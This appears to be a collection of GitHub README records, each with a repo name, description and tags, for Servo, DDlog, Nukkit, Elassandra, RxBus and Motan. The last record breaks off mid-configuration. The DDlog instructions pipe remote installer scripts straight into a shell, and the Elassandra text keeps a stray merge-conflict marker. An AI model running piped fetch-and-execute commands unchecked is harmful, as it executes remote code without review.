# DEPRECATED This project receives minimal maintenance to keep software that relies on it working. There is no active development or planned feature improvement. For any new projects it is recommended to use the [Spectator] library instead. For more details see the [Servo comparison] page in the Spectator docs. [Spectator]: https://github.com/Netflix/spectator [Servo comparison]: http://netflix.github.io/spectator/en/latest/intro/servo-comparison/ # No-Op Registry As of version 0.13.0, the default monitor registry is a no-op implementation to minimize the overhead for legacy apps that still happen to have some usage of Servo. If the previous behavior is needed, then set the following system property: ``` com.netflix.servo.DefaultMonitorRegistry.registryClass=com.netflix.servo.jmx.JmxMonitorRegistry ``` # Servo: Application Metrics in Java > servo v. : WATCH OVER, OBSERVE >Latin. Servo provides a simple interface for exposing and publishing application metrics in Java. The primary goals are: * **Leverage JMX**: JMX is the standard monitoring interface for Java and can be queried by many existing tools. * **Keep It Simple**: It should be trivial to expose metrics and publish metrics without having to write lots of code such as [MBean interfaces](http://docs.oracle.com/javase/tutorial/jmx/mbeans/standard.html). * **Flexible Publishing**: Once metrics are exposed, it should be easy to regularly poll the metrics and make them available for internal reporting systems, logs, and services like [Amazon CloudWatch](http://aws.amazon.com/cloudwatch/). This has already been implemented inside of Netflix and most of our applications currently use it. ## Project Details ### Build Status [![Build Status](https://travis-ci.org/Netflix/servo.svg)](https://travis-ci.org/Netflix/servo/builds) ### Versioning Servo is released with a 0.X.Y version because it has not yet reached full API stability. Given a version number MAJOR.MINOR.PATCH, increment the: * MINOR version when there are binary incompatible changes, and * PATCH version when new functionality or bug fixes are backwards compatible. ### Documentation * [GitHub Wiki](https://github.com/Netflix/servo/wiki) * [Javadoc](http://netflix.github.io/servo/current/servo-core/docs/javadoc/) ### Communication * Google Group: [Netflix Atlas](https://groups.google.com/forum/#!forum/netflix-atlas) * For bugs, feedback, questions and discussion please use [GitHub Issues](https://github.com/Netflix/servo/issues). * If you want to help contribute to the project, see [CONTRIBUTING.md](https://github.com/Netflix/servo/blob/master/CONTRIBUTING.md) for details. ## Project Usage ### Build To build the Servo project: ``` $ git clone https://github.com/Netflix/servo.git $ cd servo $ ./gradlew build ``` More details can be found on the [Getting Started](https://github.com/Netflix/servo/wiki/Getting-Started) page of the wiki. ### Binaries Binaries and dependency information can be found at [Maven Central](http://search.maven.org/#search%7Cga%7C1%7Ccom.netflix.servo). Maven Example: ``` <dependency> <groupId>com.netflix.servo</groupId> <artifactId>servo-core</artifactId> <version>0.12.7</version> </dependency> ``` Ivy Example: ``` <dependency org="com.netflix.servo" name="servo-core" rev="0.12.7" /> ``` ## License Copyright 2012-2016 Netflix, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
vmware/differential-datalog
DDlog is a programming language for incremental computation. It is well suited for writing programs that continuously update their output in response to input changes. A DDlog programmer does not write incremental algorithms; instead they specify the desired input-output mapping in a declarative manner.
datalog ddlog incremental programming-language rust
[![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](https://opensource.org/licenses/MIT) [![CI workflow](https://github.com/vmware/differential-datalog/actions/workflows/main.yml/badge.svg)](https://github.com/vmware/differential-datalog/actions) [![pipeline status](https://gitlab.com/ddlog/differential-datalog/badges/master/pipeline.svg)](https://gitlab.com/ddlog/differential-datalog/commits/master) [![rustc](https://img.shields.io/badge/rustc-1.52.1+-blue.svg)](https://blog.rust-lang.org/2021/05/10/Rust-1.52.1.html) [![Gitter chat](https://badges.gitter.im/vmware/differential-datalog.png)](https://gitter.im/vmware/differential-datalog) # Differential Datalog (DDlog) DDlog is a programming language for *incremental computation*. It is well suited for writing programs that continuously update their output in response to input changes. With DDlog, the programmer does not need to worry about writing incremental algorithms. Instead they specify the desired input-output mapping in a declarative manner, using a dialect of Datalog. The DDlog compiler then synthesizes an efficient incremental implementation. DDlog is based on [Frank McSherry's](https://github.com/frankmcsherry/) excellent [differential dataflow](https://github.com/TimelyDataflow/differential-dataflow) library. DDlog has the following key properties: 1. **Relational**: A DDlog program transforms a set of input relations (or tables) into a set of output relations. It is thus well suited for applications that operate on relational data, ranging from real-time analytics to cloud management systems and static program analysis tools. 2. **Dataflow-oriented**: At runtime, a DDlog program accepts a *stream of updates* to input relations. Each update inserts, deletes, or modifies a subset of input records. DDlog responds to an input update by outputting an update to its output relations. 3. **Incremental**: DDlog processes input updates by performing the minimum amount of work necessary to compute changes to output relations. This has significant performance benefits for many queries. 4. **Bottom-up**: DDlog starts from a set of input facts and computes *all* possible derived facts by following user-defined rules, in a bottom-up fashion. In contrast, top-down engines are optimized to answer individual user queries without computing all possible facts ahead of time. For example, given a Datalog program that computes pairs of connected vertices in a graph, a bottom-up engine maintains the set of all such pairs. A top-down engine, on the other hand, is triggered by a user query to determine whether a pair of vertices is connected and handles the query by searching for a derivation chain back to ground facts. The bottom-up approach is preferable in applications where all derived facts must be computed ahead of time and in applications where the cost of initial computation is amortized across a large number of queries. 5. **In-memory**: DDlog stores and processes data in memory. In a typical use case, a DDlog program is used in conjunction with a persistent database, with database records being fed to DDlog as ground facts and the derived facts computed by DDlog being written back to the database. At the moment, DDlog can only operate on databases that completely fit the memory of a single machine. We are working on a distributed version of DDlog that will be able to partition its state and computation across multiple machines. 6. **Typed**: In its classical textbook form Datalog is more of a mathematical formalism than a practical tool for programmers. In particular, pure Datalog does not have concepts like types, arithmetics, strings or functions. To facilitate writing of safe, clear, and concise code, DDlog extends pure Datalog with: 1. A powerful type system, including Booleans, unlimited precision integers, bitvectors, floating point numbers, strings, tuples, tagged unions, vectors, sets, and maps. All of these types can be stored in DDlog relations and manipulated by DDlog rules. Thus, with DDlog one can perform relational operations, such as joins, directly over structured data, without having to flatten it first (as is often done in SQL databases). 2. Standard integer, bitvector, and floating point arithmetic. 3. A simple procedural language that allows expressing many computations natively in DDlog without resorting to external functions. 4. String operations, including string concatenation and interpolation. 5. Syntactic sugar for writing imperative-style code using for/let/assignments. 7. **Integrated**: while DDlog programs can be run interactively via a command line interface, its primary use case is to integrate with other applications that require deductive database functionality. A DDlog program is compiled into a Rust library that can be linked against a Rust, C/C++, Java, or Go program (bindings for other languages can be easily added). This enables good performance, but somewhat limits the flexibility, as changes to the relational schema or rules require re-compilation. ## Documentation - Follow the [tutorial](doc/tutorial/tutorial.md) for a step-by-step introduction to DDlog. - DDlog [language reference](doc/language_reference/language_reference.md). - DDlog [command reference](doc/command_reference/command_reference.md) for writing and testing your own Datalog programs. - [How to](doc/java_api.md) use DDlog from Java. - [How to](doc/c_tutorial/c_tutorial.rst) use DDlog from C. - [How to](go/README.md) use DDlog from Go and [Go API documentation](https://pkg.go.dev/github.com/vmware/differential-datalog/go/pkg/ddlog). - [How to](test/datalog_tests/rust_api_test) use DDlog from Rust (by example) - [Tutorial](doc/profiling/profiling.md) on profiling DDlog programs - [DDlog overview paper](doc/datalog2.0-workshop/paper.pdf), Datalog 2.0 workshop, 2019. ## Installation ### Installing DDlog from a binary release To install a precompiled version of DDlog, download the [latest binary release](https://github.com/vmware/differential-datalog/releases), extract it from archive, add `ddlog/bin` to your `$PATH`, and set `$DDLOG_HOME` to point to the `ddlog` directory. You will also need to install the Rust toolchain (see instructions below). If you're using OS X, you will need to override the binary's security settings through [these instructions](https://support.apple.com/guide/mac-help/open-a-mac-app-from-an-unidentified-developer-mh40616/mac). Else, when first running the DDlog compiler (through calling `ddlog`), you will get the following warning dialog: ``` "ddlog" cannot be opened because the developer cannot be verified. macOS cannot verify that this app is free from malware. ``` You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md). ### Compiling DDlog from sources #### Installing dependencies manually - Haskell [stack](https://github.com/commercialhaskell/stack): ``` wget -qO- https://get.haskellstack.org/ | sh ``` - Rust toolchain v1.52.1 or later: ``` curl https://sh.rustup.rs -sSf | sh . $HOME/.cargo/env rustup component add rustfmt rustup component add clippy ``` **Note:** The `rustup` script adds path to Rust toolchain binaries (typically, `$HOME/.cargo/bin`) to `~/.profile`, so that it becomes effective at the next login attempt. To configure your current shell run `source $HOME/.cargo/env`. - JDK, e.g.: ``` apt install default-jdk ``` - Google FlatBuffers library. Download and build FlatBuffers release 1.11.0 from [github](https://github.com/google/flatbuffers/releases/tag/v1.11.0). Make sure that the `flatc` tool is in your `$PATH`. Additionally, make sure that FlatBuffers Java classes are in your `$CLASSPATH`: ``` ./tools/install-flatbuf.sh cd flatbuffers export CLASSPATH=`pwd`"/java":$CLASSPATH export PATH=`pwd`:$PATH cd .. ``` - Static versions of the following libraries: `libpthread.a`, `libc.a`, `libm.a`, `librt.a`, `libutil.a`, `libdl.a`, `libgmp.a`, and `libstdc++.a` can be installed from distro-specific packages. On Ubuntu: ``` apt install libc6-dev libgmp-dev ``` On Fedora: ``` dnf install glibc-static gmp-static libstdc++-static ``` #### Building To build the software once you've installed the dependencies using one of the above methods, clone this repository and set `$DDLOG_HOME` variable to point to the root of the repository. Run ``` stack build ``` anywhere inside the repository to build the DDlog compiler. To install DDlog binaries in Haskell stack's default binary directory: ``` stack install ``` To install to a different location: ``` stack install --local-bin-path <custom_path> ``` To test basic DDlog functionality: ``` stack test --ta '-p path' ``` **Note:** this takes a few minutes You are now ready to [start coding in DDlog](doc/tutorial/tutorial.md). ### vim syntax highlighting The easiest way to enable differential datalog syntax highlighting for `.dl` files in Vim is by creating a symlink from `<ddlog-folder>/tools/vim/syntax/dl.vim` into `~/.vim/syntax/`. If you are using a plugin manager you may be able to directly consume the file from the upstream repository as well. In the case of [`Vundle`](https://github.com/VundleVim/Vundle.vim), for example, configuration could look as follows: ```vim call vundle#begin('~/.config/nvim/bundle') ... Plugin 'vmware/differential-datalog', {'rtp': 'tools/vim'} <---- relevant line ... call vundle#end() ``` ## Debugging with GHCi To run the test suite with the GHCi debugger: ``` stack ghci --ghci-options -isrc --ghci-options -itest differential-datalog:differential-datalog-test ``` and type `do main` in the command prompt. ## Building with profiling info enabled ``` stack clean ``` followed by ``` stack build --profile ``` or ``` stack test --profile ```
0
CloudburstMC/Nukkit
Cloudburst Nukkit - Nuclear-Powered Minecraft: Bedrock Edition Server Software
bedrock bedrock-edition bedrock-engine java mcbe mcbe-server mcpe mcpe-server minecraft minecraft-server nukkit pocket-edition
![nukkit](.github/images/banner.png) [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](LICENSE) [![Build Status](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/badge/icon)](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master/) [![Discord](https://img.shields.io/discord/393465748535640064.svg)](https://discord.gg/5PzMkyK) Introduction ------------- Nukkit is nuclear-powered server software for Minecraft: Pocket Edition. It has a few key advantages over other server software: * Written in Java, Nukkit is faster and more stable. * Having a friendly structure, it's easy to contribute to Nukkit's development and rewrite plugins from other platforms into Nukkit plugins. Nukkit is **under improvement** yet, we welcome contributions. Links -------------------- * __[News](https://nukkitx.com)__ * __[Forums](https://nukkitx.com/forums)__ * __[Discord](https://discord.gg/5PzMkyK)__ * __[Download](https://ci.nukkitx.com/job/NukkitX/job/Nukkit/job/master)__ * __[Plugins](https://nukkitx.com/resources/categories/nukkit-plugins.1)__ * __[Wiki](https://nukkitx.com/wiki/nukkit)__ Contributing ------------- Please read the [CONTRIBUTING](.github/CONTRIBUTING.md) guide before submitting any issue. Issues with insufficient information or in the wrong format will be closed and will not be reviewed. Build JAR file ------------- - `git clone https://github.com/CloudburstMC/Nukkit` - `cd Nukkit` - `git submodule update --init` - `./gradlew shadowJar` The compiled JAR can be found in the `target/` directory. Running ------------- Simply run `java -jar nukkit-1.0-SNAPSHOT.jar`. Plugin API ------------- Information on Nukkit's API can be found at the [wiki](https://nukkitx.com/wiki/nukkit/). Docker ------------- Running Nukkit in [Docker](https://www.docker.com/) (17.05+ or higher). Build image from the source, ``` docker build -t nukkit . ``` Run once to generate the `nukkit-data` volume, default settings, and choose language, ``` docker run -it -p 19132:19132/udp -v nukkit-data:/data nukkit ``` Docker Compose ------------- Use [docker-compose](https://docs.docker.com/compose/overview/) to start server on port `19132` and with `nukkit-data` volume, ``` docker-compose up -d ``` Kubernetes & Helm ------------- Validate the chart: `helm lint charts/nukkit` Dry run and print out rendered YAML: `helm install --dry-run --debug nukkit charts/nukkit` Install the chart: `helm install nukkit charts/nukkit` Or, with some different values: ``` helm install nukkit \ --set image.tag="arm64" \ --set service.type="LoadBalancer" \ charts/nukkit ``` Or, the same but with a custom values from a file: ``` helm install nukkit \ -f helm-values.local.yaml \ charts/nukkit ``` Upgrade the chart: `helm upgrade nukkit charts/nukkit` Testing after deployment: `helm test nukkit` Completely remove the chart: `helm uninstall nukkit`
0
strapdata/elassandra
Elassandra = Elasticsearch + Apache Cassandra
aggregation cassandra completion elasticsearch fuzzy-search kibana logstash lucene masterless mission-critical nosql rest-api search spark
# Elassandra [![Build Status](https://travis-ci.org/strapdata/elassandra.svg)](https://travis-ci.org/strapdata/elassandra) [![Documentation Status](https://readthedocs.org/projects/elassandra/badge/?version=latest)](https://elassandra.readthedocs.io/en/latest/?badge=latest) [![GitHub release](https://img.shields.io/github/v/release/strapdata/elassandra.svg)](https://github.com/strapdata/elassandra/releases/latest) [![Twitter](https://img.shields.io/twitter/follow/strapdataio?style=social)](https://twitter.com/strapdataio) ![Elassandra Logo](elassandra-logo.png) ## [http://www.elassandra.io/](http://www.elassandra.io/) Elassandra is an [Apache Cassandra](http://cassandra.apache.org) distribution including an [Elasticsearch](https://github.com/elastic/elasticsearch) search engine. Elassandra is a multi-master multi-cloud database and search engine with support for replicating across multiple datacenters in active/active mode. Elasticsearch code is embedded in Cassanda nodes providing advanced search features on Cassandra tables and Cassandra serves as an Elasticsearch data and configuration store. ![Elassandra architecture](/docs/elassandra/source/images/elassandra1.jpg) Elassandra supports Cassandra vnodes and scales horizontally by adding more nodes without the need to reshard indices. Project documentation is available at [doc.elassandra.io](http://doc.elassandra.io). ## Benefits of Elassandra For Cassandra users, elassandra provides Elasticsearch features : * Cassandra updates are indexed in Elasticsearch. * Full-text and spatial search on your Cassandra data. * Real-time aggregation (does not require Spark or Hadoop to GROUP BY) * Provide search on multiple keyspaces and tables in one query. * Provide automatic schema creation and support nested documents using [User Defined Types](https://docs.datastax.com/en/cql/3.1/cql/cql_using/cqlUseUDT.html). * Provide read/write JSON REST access to Cassandra data. * Numerous Elasticsearch plugins and products like [Kibana](https://www.elastic.co/guide/en/kibana/current/introduction.html). * Manage concurrent elasticsearch mappings changes and applies batched atomic CQL schema changes. * Support [Elasticsearch ingest processors](https://www.elastic.co/guide/en/elasticsearch/reference/master/ingest.html) allowing to transform input data. For Elasticsearch users, elassandra provides useful features : * Elassandra is masterless. Cluster state is managed through [cassandra lightweight transactions](http://www.datastax.com/dev/blog/lightweight-transactions-in-cassandra-2-0). * Elassandra is a sharded multi-master database, where Elasticsearch is sharded master-slave. Thus, Elassandra has no Single Point Of Write, helping to achieve high availability. * Elassandra inherits Cassandra data repair mechanisms (hinted handoff, read repair and nodetool repair) providing support for **cross datacenter replication**. * When adding a node to an Elassandra cluster, only data pulled from existing nodes are re-indexed in Elasticsearch. * Cassandra could be your unique datastore for indexed and non-indexed data. It's easier to manage and secure. Source documents are now stored in Cassandra, reducing disk space if you need a NoSQL database and Elasticsearch. * Write operations are not restricted to one primary shard, but distributed across all Cassandra nodes in a virtual datacenter. The number of shards does not limit your write throughput. Adding elassandra nodes increases both read and write throughput. * Elasticsearch indices can be replicated among many Cassandra datacenters, allowing write to the closest datacenter and search globally. * The [cassandra driver](http://www.planetcassandra.org/client-drivers-tools/) is Datacenter and Token aware, providing automatic load-balancing and failover. * Elassandra efficiently stores Elasticsearch documents in binary SSTables without any JSON overhead. ## Quick start * [Quick Start](http://doc.elassandra.io/en/latest/quickstart.html) guide to run a single node Elassandra cluster in docker. * [Deploy Elassandra by launching a Google Kubernetes Engine](./docs/google-kubernetes-tutorial.md): [![Open in Cloud Shell](https://gstatic.com/cloudssh/images/open-btn.png)](https://console.cloud.google.com/cloudshell/open?git_repo=https://github.com/strapdata/elassandra-google-k8s-marketplace&tutorial=docs/google-kubernetes-tutorial.md) ## Upgrade Instructions #### Elassandra 6.8.4.2+ <<<<<<< HEAD Since version 6.8.4.2, the gossip X1 application state can be compressed using a system property. Enabling this settings allows the creation of a lot of virtual indices. Before enabling this setting, upgrade all the 6.8.4.x nodes to the 6.8.4.2 (or higher). Once all the nodes are in 6.8.4.2, they are able to decompress the application state even if the settings isn't yet configured locally. #### Elassandra 6.2.3.25+ Elassandra use the Cassandra GOSSIP protocol to manage the Elasticsearch routing table and Elassandra 6.8.4.2+ add support for compression of the X1 application state to increase the maxmimum number of Elasticsearch indices. For backward compatibility, the compression is disabled by default, but once all your nodes are upgraded into version 6.8.4.2+, you should enable the X1 compression by adding **-Des.compress_x1=true** in your **conf/jvm.options** and rolling restart all nodes. Nodes running version 6.8.4.2+ are able to read compressed and not compressed X1. #### Elassandra 6.2.3.21+ Before version 6.2.3.21, the Cassandra replication factor for the **elasic_admin** keyspace (and elastic_admin_[datacenter.group]) was automatically adjusted to the number of nodes of the datacenter. Since version 6.2.3.21 and because it has a performance impact on large clusters, it's now up to your Elassandra administrator to properly adjust the replication factor for this keyspace. Keep in mind that Elasticsearch mapping updates rely on a PAXOS transaction that requires QUORUM nodes to succeed, so replication factor should be at least 3 on each datacenter. #### Elassandra 6.2.3.19+ Elassandra 6.2.3.19 metadata version now relies on the Cassandra table **elastic_admin.metadata_log** (that was **elastic_admin.metadata** from 6.2.3.8 to 6.2.3.18) to keep the elasticsearch mapping update history and automatically recover from a possible PAXOS write timeout issue. When upgrading the first node of a cluster, Elassandra automatically copy the current **metadata.version** into the new **elastic_admin.metadata_log** table. To avoid Elasticsearch mapping inconsistency, you must avoid mapping update while the rolling upgrade is in progress. Once all nodes are upgraded, the **elastic_admin.metadata** is not more used and can be removed. Then, you can get the mapping update history from the new **elastic_admin.metadata_log** and know which node has updated the mapping, when and for which reason. #### Elassandra 6.2.3.8+ Elassandra 6.2.3.8+ now fully manages the elasticsearch mapping in the CQL schema through the use of CQL schema extensions (see *system_schema.tables*, column *extensions*). These table extensions and the CQL schema updates resulting of elasticsearch index creation/modification are updated in batched atomic schema updates to ensure consistency when concurrent updates occurs. Moreover, these extensions are stored in binary and support partial updates to be more efficient. As the result, the elasticsearch mapping is not more stored in the *elastic_admin.metadata* table. WARNING: During the rolling upgrade, elasticserach mapping changes are not propagated between nodes running the new and the old versions, so don't change your mapping while you're upgrading. Once all your nodes have been upgraded to 6.2.3.8+ and validated, apply the following CQL statements to remove useless elasticsearch metadata: ```bash ALTER TABLE elastic_admin.metadata DROP metadata; ALTER TABLE elastic_admin.metadata WITH comment = ''; ``` WARNING: Due to CQL table extensions used by Elassandra, some old versions of **cqlsh** may lead to the following error message **"'module' object has no attribute 'viewkeys'."**. This comes from the old python cassandra driver embedded in Cassandra and has been reported in [CASSANDRA-14942](https://issues.apache.org/jira/browse/CASSANDRA-14942). Possible workarounds: * Use the **cqlsh** embedded with Elassandra * Install a recent version of the **cqlsh** utility (*pip install cqlsh*) or run it from a docker image: ```bash docker run -it --rm strapdata/cqlsh:0.1 node.example.com ``` #### Elassandra 6.x changes * Elasticsearch now supports only one document type per index backed by one Cassandra table. Unless you specify an elasticsearch type name in your mapping, data is stored in a cassandra table named **"_doc"**. If you want to search many cassandra tables, you now need to create and search many indices. * Elasticsearch 6.x manages shard consistency through several metadata fields (_primary_term, _seq_no, _version) that are not used in elassandra because replication is fully managed by cassandra. ## Installation Ensure Java 8 is installed and `JAVA_HOME` points to the correct location. * [Download](https://github.com/strapdata/elassandra/releases) and extract the distribution tarball * Define the CASSANDRA_HOME environment variable : `export CASSANDRA_HOME=<extracted_directory>` * Run `bin/cassandra -e` * Run `bin/nodetool status` * Run `curl -XGET localhost:9200/_cluster/state` #### Example Try indexing a document on a non-existing index: ```bash curl -XPUT 'http://localhost:9200/twitter/_doc/1?pretty' -H 'Content-Type: application/json' -d '{ "user": "Poulpy", "post_date": "2017-10-04T13:12:00Z", "message": "Elassandra adds dynamic mapping to Cassandra" }' ``` Then look-up in Cassandra: ```bash bin/cqlsh -e "SELECT * from twitter.\"_doc\"" ``` Behind the scenes, Elassandra has created a new Keyspace `twitter` and table `_doc`. ```CQL admin@cqlsh>DESC KEYSPACE twitter; CREATE KEYSPACE twitter WITH replication = {'class': 'NetworkTopologyStrategy', 'DC1': '1'} AND durable_writes = true; CREATE TABLE twitter."_doc" ( "_id" text PRIMARY KEY, message list<text>, post_date list<timestamp>, user list<text> ) WITH bloom_filter_fp_chance = 0.01 AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'} AND comment = '' AND compaction = {'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32', 'min_threshold': '4'} AND compression = {'chunk_length_in_kb': '64', 'class': 'org.apache.cassandra.io.compress.LZ4Compressor'} AND crc_check_chance = 1.0 AND dclocal_read_repair_chance = 0.1 AND default_time_to_live = 0 AND gc_grace_seconds = 864000 AND max_index_interval = 2048 AND memtable_flush_period_in_ms = 0 AND min_index_interval = 128 AND read_repair_chance = 0.0 AND speculative_retry = '99PERCENTILE'; CREATE CUSTOM INDEX elastic__doc_idx ON twitter."_doc" () USING 'org.elassandra.index.ExtendedElasticSecondaryIndex'; ``` By default, multi valued Elasticsearch fields are mapped to Cassandra list. Now, insert a row with CQL : ```CQL INSERT INTO twitter."_doc" ("_id", user, post_date, message) VALUES ( '2', ['Jimmy'], [dateof(now())], ['New data is indexed automatically']); SELECT * FROM twitter."_doc"; _id | message | post_date | user -----+--------------------------------------------------+-------------------------------------+------------ 2 | ['New data is indexed automatically'] | ['2019-07-04 06:00:21.893000+0000'] | ['Jimmy'] 1 | ['Elassandra adds dynamic mapping to Cassandra'] | ['2017-10-04 13:12:00.000000+0000'] | ['Poulpy'] (2 rows) ``` Then search for it with the Elasticsearch API: ```bash curl "localhost:9200/twitter/_search?q=user:Jimmy&pretty" ``` And here is a sample response : ```JSON { "took" : 3, "timed_out" : false, "_shards" : { "total" : 1, "successful" : 1, "skipped" : 0, "failed" : 0 }, "hits" : { "total" : 1, "max_score" : 0.6931472, "hits" : [ { "_index" : "twitter", "_type" : "_doc", "_id" : "2", "_score" : 0.6931472, "_source" : { "post_date" : "2019-07-04T06:00:21.893Z", "message" : "New data is indexed automatically", "user" : "Jimmy" } } ] } } ``` ## Support * Commercial support is available through [Strapdata](http://www.strapdata.com/). * Community support available via [elassandra google groups](https://groups.google.com/forum/#!forum/elassandra). * Post feature requests and bugs on https://github.com/strapdata/elassandra/issues ## License ``` This software is licensed under the Apache License, version 2 ("ALv2"), quoted below. Copyright 2015-2018, Strapdata (contact@strapdata.com). Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ``` ## Acknowledgments * Elasticsearch, Logstash, Beats and Kibana are trademarks of Elasticsearch BV, registered in the U.S. and in other countries. * Apache Cassandra, Apache Lucene, Apache, Lucene and Cassandra are trademarks of the Apache Software Foundation. * Elassandra is a trademark of Strapdata SAS.
0
AndroidKnife/RxBus
Event Bus By RxJava.
rxandroid rxbus rxjava rxjava2
RxBus - An event bus by [ReactiveX/RxJava](https://github.com/ReactiveX/RxJava)/[ReactiveX/RxAndroid](https://github.com/ReactiveX/RxAndroid) ============================= This is an event bus designed to allowing your application to communicate efficiently. I have use it in many projects, and now i think maybe someone would like it, so i publish it. RxBus support annotations(@produce/@subscribe), and it can provide you to produce/subscribe on other thread like MAIN_THREAD, NEW_THREAD, IO, COMPUTATION, TRAMPOLINE, IMMEDIATE, even the EXECUTOR and HANDLER thread, more in [EventThread](rxbus/src/main/java/com/hwangjr/rxbus/thread/EventThread.java). Also RxBus provide the event tag to define the event. The method's first (and only) parameter and tag defines the event type. **Thanks to:** [square/otto](https://github.com/square/otto) [greenrobot/EventBus](https://github.com/greenrobot/EventBus) Usage -------- Just 2 Steps: **STEP 1** Add dependency to your gradle file: ```groovy compile 'com.hwangjr.rxbus:rxbus:3.0.0' ``` Or maven: ``` xml <dependency> <groupId>com.hwangjr.rxbus</groupId> <artifactId>rxbus</artifactId> <version>3.0.0</version> <type>aar</type> </dependency> ``` **TIP:** Maybe you also use the [JakeWharton/timber](https://github.com/JakeWharton/timber) to log your message, you may need to exclude the timber (from version 1.0.4, timber dependency update from [AndroidKnife/Utils/timber](https://github.com/AndroidKnife/Utils/tree/master/timber) to JakeWharton): ``` groovy compile ('com.hwangjr.rxbus:rxbus:3.0.0') { exclude group: 'com.jakewharton.timber', module: 'timber' } ``` en Snapshots of the development version are available in [Sonatype's `snapshots` repository](https://oss.sonatype.org/content/repositories/snapshots/). **STEP 2** Just use the provided(Any Thread Enforce): ``` java com.hwangjr.rxbus.RxBus ``` Or make RxBus instance is a better choice: ``` java public static final class RxBus { private static Bus sBus; public static synchronized Bus get() { if (sBus == null) { sBus = new Bus(); } return sBus; } } ``` Add the code where you want to produce/subscribe events, and register and unregister the class. ``` java public class MainActivity extends AppCompatActivity { ... @Override protected void onCreate(Bundle savedInstanceState) { ... RxBus.get().register(this); ... } @Override protected void onDestroy() { ... RxBus.get().unregister(this); ... } @Subscribe public void eat(String food) { // purpose } @Subscribe( thread = EventThread.IO, tags = { @Tag(BusAction.EAT_MORE) } ) public void eatMore(List<String> foods) { // purpose } @Produce public String produceFood() { return "This is bread!"; } @Produce( thread = EventThread.IO, tags = { @Tag(BusAction.EAT_MORE) } ) public List<String> produceMoreFood() { return Arrays.asList("This is breads!"); } public void post() { RxBus.get().post(this); } public void postByTag() { RxBus.get().post(Constants.EventType.TAG_STORY, this); } ... } ``` **That is all done!** Lint -------- Features -------- * JUnit test * Docs History -------- Here is the [CHANGELOG](CHANGELOG.md). FAQ -------- **Q:** How to do pull requests?<br/> **A:** Ensure good code quality and consistent formatting. License -------- Copyright 2015 HwangJR, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
weibocom/motan
A cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services.
null
# Motan [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://github.com/weibocom/motan/blob/master/LICENSE) [![Maven Central](https://img.shields.io/maven-central/v/com.weibo/motan.svg?label=Maven%20Central)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.weibo%22%20AND%20motan) [![Build Status](https://img.shields.io/travis/weibocom/motan/master.svg?label=Build)](https://travis-ci.org/weibocom/motan) [![OpenTracing-1.0 Badge](https://img.shields.io/badge/OpenTracing--1.0-enabled-blue.svg)](http://opentracing.io) [![Skywalking Tracing](https://img.shields.io/badge/Skywalking%20Tracing-enable-brightgreen.svg)](https://github.com/OpenSkywalking/skywalking) # Overview Motan is a cross-language remote procedure call(RPC) framework for rapid development of high performance distributed services. Related projects in Motan ecosystem: - [Motan-go](https://github.com/weibocom/motan-go) is golang implementation. - [Motan-PHP](https://github.com/weibocom/motan-php) is PHP client can interactive with Motan server directly or through Motan-go agent. - [Motan-openresty](https://github.com/weibocom/motan-openresty) is a Lua(Luajit) implementation based on [Openresty](http://openresty.org). # Features - Create distributed services without writing extra code. - Provides cluster support and integrate with popular service discovery services like [Consul][consul] or [Zookeeper][zookeeper]. - Supports advanced scheduling features like weighted load-balance, scheduling cross IDCs, etc. - Optimization for high load scenarios, provides high availability in production environment. - Supports both synchronous and asynchronous calls. - Support cross-language interactive with Golang, PHP, Lua(Luajit), etc. # Quick Start The quick start gives very basic example of running client and server on the same machine. For the detailed information about using and developing Motan, please jump to [Documents](#documents). > The minimum requirements to run the quick start are: > > - JDK 1.8 or above > - A java-based project management software like [Maven][maven] or [Gradle][gradle] ## Synchronous calls 1. Add dependencies to pom. ```xml <properties> <motan.version>1.1.12</motan.version> <!--use the latest version from maven central--> </properties> <dependencies> <dependency> <groupId>com.weibo</groupId> <artifactId>motan-core</artifactId> <version>${motan.version}</version> </dependency> <dependency> <groupId>com.weibo</groupId> <artifactId>motan-transport-netty</artifactId> <version>${motan.version}</version> </dependency> <!-- dependencies below were only needed for spring-based features --> <dependency> <groupId>com.weibo</groupId> <artifactId>motan-springsupport</artifactId> <version>${motan.version}</version> </dependency> <dependency> <groupId>org.springframework</groupId> <artifactId>spring-context</artifactId> <version>4.2.4.RELEASE</version> </dependency> </dependencies> ``` 2. Create an interface for both service provider and consumer. `src/main/java/quickstart/FooService.java` ```java package quickstart; public interface FooService { public String hello(String name); } ``` 3. Write an implementation, create and start RPC Server. `src/main/java/quickstart/FooServiceImpl.java` ```java package quickstart; public class FooServiceImpl implements FooService { public String hello(String name) { System.out.println(name + " invoked rpc service"); return "hello " + name; } } ``` `src/main/resources/motan_server.xml` ```xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:motan="http://api.weibo.com/schema/motan" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-2.5.xsd http://api.weibo.com/schema/motan 